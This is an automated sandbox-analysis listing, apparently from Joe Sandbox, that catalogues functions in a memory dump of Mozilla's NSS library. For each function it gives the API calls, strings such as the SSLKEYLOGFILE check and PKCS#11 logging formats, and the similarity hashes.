Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607D6
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9F204A), ref: 6CA607E4
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,6C9F204A), ref: 6CA60864
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA60880
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,6C9F204A), ref: 6CA608CB
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608D7
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608FB

TlsGetValue.KERNEL32 ref: 6CAB4DD7
EnterCriticalSection.KERNEL32(?), ref: 6CAB4DEC
PR_Unlock.NSS3(?), ref: 6CAB4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6CAB4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6CAB4E71
free.MOZGLUE(00000000), ref: 6CAB4E7A
PR_Unlock.NSS3(?), ref: 6CAB4EA2
TlsGetValue.KERNEL32 ref: 6CAB4EC1
EnterCriticalSection.KERNEL32(?), ref: 6CAB4ED6
PR_Unlock.NSS3(?), ref: 6CAB4F01
free.MOZGLUE(00000000), ref: 6CAB4F2A

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 7b724f8e881855992f7d2b396121c9019ee91d482644592df49e6496dd9de060
Instruction ID: 9cbb45d8293373de562bfe9db5839057edeba01d32e7419994491289419917f8
Opcode Fuzzy Hash: 7b724f8e881855992f7d2b396121c9019ee91d482644592df49e6496dd9de060
Instruction Fuzzy Hash: 76B1E475A002059FDF01EF68D845BAA77B8FF0A318F084128ED15A7B41E735EAA5CBD1

Function 6CB06E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CB06BF7), ref: 6CB06EB6

Part of subcall function 6CA61240: TlsGetValue.KERNEL32(00000040,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA61267
Part of subcall function 6CA61240: EnterCriticalSection.KERNEL32(?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA6127C
Part of subcall function 6CA61240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA61291
Part of subcall function 6CA61240: PR_Unlock.NSS3(?,?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA612A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CBAFC0A,6CB06BF7), ref: 6CB06ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CB06EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CB06EFC
PR_NewLock.NSS3 ref: 6CB06F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB06F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CB06BF7), ref: 6CB06F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CB06BF7), ref: 6CB06F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CB06BF7), ref: 6CB06FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CB06BF7), ref: 6CB06FFD

Strings

# SSL/TLS secrets log file, generated by NSS, xrefs: 6CB06EF7
SSLKEYLOGFILE, xrefs: 6CB06EB1
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CB06F4F
SSLFORCELOCKS, xrefs: 6CB06F2B
NSS_SSL_CBC_RANDOM_IV, xrefs: 6CB06FF8
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CB06FDB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 7d62542235d98c2d1d6c5f54fed91ca43207479684f7de8f764e74fbd72ca967
Instruction ID: cb44ce9ccfbb3fa73c71e27395285102969c5c0ebf30ef7da750ebfa8746273b
Opcode Fuzzy Hash: 7d62542235d98c2d1d6c5f54fed91ca43207479684f7de8f764e74fbd72ca967
Instruction Fuzzy Hash: 4DA139B2B658D087FB104A3CDC113997BA2EB93329F184369EC31D7ED5DBB5A4818342

Function 6CA85DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA85DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CA85E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6CA85E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6CA85E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CA85EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CA85ED9
SECKEY_SignatureLen.NSS3(?), ref: 6CA85F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CA85F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA85F89
free.MOZGLUE(?), ref: 6CA85FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA85FB6
free.MOZGLUE(00000000), ref: 6CA85FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA8600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA86079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA86084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA86094

Strings

, xrefs: 6CA85EEB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: aec85d590d53b6dd570dfedd78fa16c156b99fc03df9666917561e65321ff0b9
Instruction ID: 54f46ff50152b65439b93b990f776eb831fc328542cc76e96c0c5bf0f344e611
Opcode Fuzzy Hash: aec85d590d53b6dd570dfedd78fa16c156b99fc03df9666917561e65321ff0b9
Instruction Fuzzy Hash: 5281F771E022059BEB10CE64CD81BAE77B5AF04318F184128EC5AA7791E731ED98CBE1

Function 6CAA6D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6CAA6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA6DC3

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CAA6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CAA6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CAA6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CAA6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CAA6EB9

Strings

hSession = 0x%x, xrefs: 6CAA6D9E, 6CAA6DAE
pulDigestLen = 0x%p, xrefs: 6CAA6E42
C_Digest, xrefs: 6CAA6D81
pDigest = 0x%p, xrefs: 6CAA6E27
pData = 0x%p, xrefs: 6CAA6DF5
ulDataLen = %d, xrefs: 6CAA6E0E
*pulDigestLen = 0x%x, xrefs: 6CAA6EB4
(CK_INVALID_HANDLE), xrefs: 6CAA6DBC

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: 4a2c7c15baa5c5a22b61c6fe9927792a43e7b7830911f918b8d56031e8a8ea55
Instruction ID: 40f399ef51f471428d87e46eefea1794263a8203ca179f7d09f7fdd99ee96030
Opcode Fuzzy Hash: 4a2c7c15baa5c5a22b61c6fe9927792a43e7b7830911f918b8d56031e8a8ea55
Instruction Fuzzy Hash: EA410635602094EFDB109F98ED58F8E7BB5EB46758F488065E80897B11DB31EC89CF92

Function 6CAA8820 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6CAA8846
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA8874
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA8883

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA8899
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6CAA88BA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6CAA88D3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CAA88EC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6CAA8907
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6CAA8979

Strings

*pulPartLen = 0x%x, xrefs: 6CAA8974
pPart = 0x%p, xrefs: 6CAA88E7
hSession = 0x%x, xrefs: 6CAA885E, 6CAA886E
pEncryptedPart = 0x%p, xrefs: 6CAA88B5
pulPartLen = 0x%p, xrefs: 6CAA8902
C_DecryptVerifyUpdate, xrefs: 6CAA8841
ulEncryptedPartLen = %d, xrefs: 6CAA88CE
(CK_INVALID_HANDLE), xrefs: 6CAA887C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptVerifyUpdate
API String ID: 1003633598-2764998763
Opcode ID: 32f15d28d911292f9f601b80b9adae86a1b42e671e6714fbc4e5f9614acdb3f9
Instruction ID: 41211a92d839fe6c7f22f525611be073aa128d229e12d7b3d1abfa58c0fff97e
Opcode Fuzzy Hash: 32f15d28d911292f9f601b80b9adae86a1b42e671e6714fbc4e5f9614acdb3f9
Instruction Fuzzy Hash: B741F5356020D4AFDB04CF94ED5CE8E7BB1EB4635CF088065E80867A11DB30AD99CB92

Function 6CAA9C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6CAA9C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA9C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA9CA3

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA9CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CAA9CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CAA9CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CAA9D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CAA9D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CAA9D42

Strings

pUsername = 0x%p, xrefs: 6CAA9D24
userType = 0x%x, xrefs: 6CAA9CD5
ulPinLen = %d, xrefs: 6CAA9D0B
hSession = 0x%x, xrefs: 6CAA9C7E, 6CAA9C8E
pPin = 0x%p, xrefs: 6CAA9CF0
ulUsernameLen = %d, xrefs: 6CAA9D3D
C_LoginUser, xrefs: 6CAA9C61
(CK_INVALID_HANDLE), xrefs: 6CAA9C9C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
API String ID: 1003633598-3838449515
Opcode ID: f5d1c5248e7fe69e17b22263077acc8146e4586f3578f74bbeee27e7356a6fe9
Instruction ID: 4d3dc0ebd4c88114da134da231da6833c03e04cd951203767bacd7e0d6710bb2
Opcode Fuzzy Hash: f5d1c5248e7fe69e17b22263077acc8146e4586f3578f74bbeee27e7356a6fe9
Instruction Fuzzy Hash: 004108356021D4BFDB00CFA4EE58E8D7BB5EB4731DF488065E9086BA11D731AC89CB92

Function 6CB028C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 6CB05B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB05B56

TlsGetValue.KERNEL32 ref: 6CB0290A
EnterCriticalSection.KERNEL32(00000001), ref: 6CB0291E
TlsGetValue.KERNEL32 ref: 6CB02937
EnterCriticalSection.KERNEL32(00000001), ref: 6CB0294B
PR_EnterMonitor.NSS3(?), ref: 6CB02966
PR_EnterMonitor.NSS3(?), ref: 6CB029AC
PR_ExitMonitor.NSS3(?), ref: 6CB029D1
PR_EnterMonitor.NSS3(?), ref: 6CB029F0
PR_EnterMonitor.NSS3(?), ref: 6CB02A15
PR_EnterMonitor.NSS3(?), ref: 6CB02A37
PR_ExitMonitor.NSS3(?), ref: 6CB02A61
PR_ExitMonitor.NSS3(?), ref: 6CB02A78
PR_ExitMonitor.NSS3(?), ref: 6CB02A8F
PR_ExitMonitor.NSS3(?), ref: 6CB02AA6

Part of subcall function 6CB39440: TlsGetValue.KERNEL32 ref: 6CB3945B
Part of subcall function 6CB39440: TlsGetValue.KERNEL32 ref: 6CB39479
Part of subcall function 6CB39440: EnterCriticalSection.KERNEL32 ref: 6CB39495
Part of subcall function 6CB39440: TlsGetValue.KERNEL32 ref: 6CB394E4
Part of subcall function 6CB39440: TlsGetValue.KERNEL32 ref: 6CB39532
Part of subcall function 6CB39440: LeaveCriticalSection.KERNEL32 ref: 6CB3955D

PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6CB02AF9
free.MOZGLUE(?), ref: 6CB02B16
PR_Unlock.NSS3(?), ref: 6CB02B6D
PR_Unlock.NSS3(?), ref: 6CB02B80

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
String ID:
API String ID: 2841089016-0
Opcode ID: a4661f607739cead524ce87df46d706862f8406699634b2f107ee2f5037c56a1
Instruction ID: 18b5e69e9a3316118a88c339d630ecac38814e9a6189627ffe4be46af602d0c7
Opcode Fuzzy Hash: a4661f607739cead524ce87df46d706862f8406699634b2f107ee2f5037c56a1
Instruction Fuzzy Hash: 4C81D5B5A00B405BEB209F75EC49B97BBE5AF15308F044938E85AC7B11EB31E51DCB82

Function 6CB89C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6CB89C70
PR_NewLock.NSS3 ref: 6CB89C85

Part of subcall function 6CB398D0: calloc.MOZGLUE(00000001,00000084,6CA60936,00000001,?,6CA6102C), ref: 6CB398E5

PR_NewCondVar.NSS3(00000000), ref: 6CB89C96

Part of subcall function 6CA5BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CA621BC), ref: 6CA5BB8C

PR_NewLock.NSS3 ref: 6CB89CA9

Part of subcall function 6CB398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CB39946
Part of subcall function 6CB398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9F16B7,00000000), ref: 6CB3994E
Part of subcall function 6CB398D0: free.MOZGLUE(00000000), ref: 6CB3995E

PR_NewLock.NSS3 ref: 6CB89CB9
PR_NewLock.NSS3 ref: 6CB89CC9
PR_NewCondVar.NSS3(00000000), ref: 6CB89CDA

Part of subcall function 6CA5BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA5BBEB
Part of subcall function 6CA5BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CA5BBFB
Part of subcall function 6CA5BB80: GetLastError.KERNEL32 ref: 6CA5BC03
Part of subcall function 6CA5BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CA5BC19
Part of subcall function 6CA5BB80: free.MOZGLUE(00000000), ref: 6CA5BC22

PR_NewCondVar.NSS3(?), ref: 6CB89CF0
PR_NewPollableEvent.NSS3 ref: 6CB89D03

Part of subcall function 6CB7F3B0: PR_CallOnce.NSS3(6CBD14B0,6CB7F510), ref: 6CB7F3E6
Part of subcall function 6CB7F3B0: PR_CreateIOLayerStub.NSS3(6CBD006C), ref: 6CB7F402
Part of subcall function 6CB7F3B0: PR_Malloc.NSS3(00000004), ref: 6CB7F416
Part of subcall function 6CB7F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CB7F42D
Part of subcall function 6CB7F3B0: PR_SetSocketOption.NSS3(?), ref: 6CB7F455
Part of subcall function 6CB7F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CB7F473

Part of subcall function 6CB39890: TlsGetValue.KERNEL32(?,?,?,6CB397EB), ref: 6CB3989E

EnterCriticalSection.KERNEL32(?), ref: 6CB89D78
calloc.MOZGLUE(00000001,0000000C), ref: 6CB89DAF
_PR_CreateThread.NSS3(00000000,6CB89EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB89D9F

Part of subcall function 6CA5B3C0: TlsGetValue.KERNEL32 ref: 6CA5B403
Part of subcall function 6CA5B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CA5B459

_PR_CreateThread.NSS3(00000000,6CB8A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB89DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6CB89DFC
_PR_CreateThread.NSS3(00000000,6CB8A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB89E29
calloc.MOZGLUE(00000001,0000000C), ref: 6CB89E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6CB89E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CB89E89

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 11194377ff155e1d732121004432d17a288f2a2477bb3d96c49cb9075b27981e
Instruction ID: 73e5a622f40b2e56d9c6b3c1d9d70e7202ae6e518e37b3d2410141266ce0d178
Opcode Fuzzy Hash: 11194377ff155e1d732121004432d17a288f2a2477bb3d96c49cb9075b27981e
Instruction Fuzzy Hash: 05616EB1D01746AFDB10DF75D844A6BBBF8FF48249B044529E819C7B11EB70E858CBA1

Function 6CAC8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6CAC8E01,00000000,6CAC9060,6CBD0B64), ref: 6CAC8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CAC8E01,00000000,6CAC9060,6CBD0B64), ref: 6CAC8E9E
PORT_ArenaAlloc_Util.NSS3(6CBD0B64,00000001,?,?,?,?,6CAC8E01,00000000,6CAC9060,6CBD0B64), ref: 6CAC8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6CAC8E01,00000000,6CAC9060,6CBD0B64), ref: 6CAC8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6CAC8E01,00000000,6CAC9060,6CBD0B64), ref: 6CAC8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6CAC8E01,00000000,6CAC9060,6CBD0B64), ref: 6CAC8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6CAC8E01), ref: 6CAC8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CBD0B64,6CBD0B64), ref: 6CAC8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6CAC8F3F

Part of subcall function 6CACA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6CACA421,00000000,00000000,6CAC9826), ref: 6CACA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAC904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6CAC8E76

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 8cd71aa5259e08804d84ce00b916783c5f65e92eb3a4b636e9759fe1e010f48e
Instruction ID: 320637fa44400591aaeae00680cc27348195902bfe70304fc2a19dfe2d616a7d
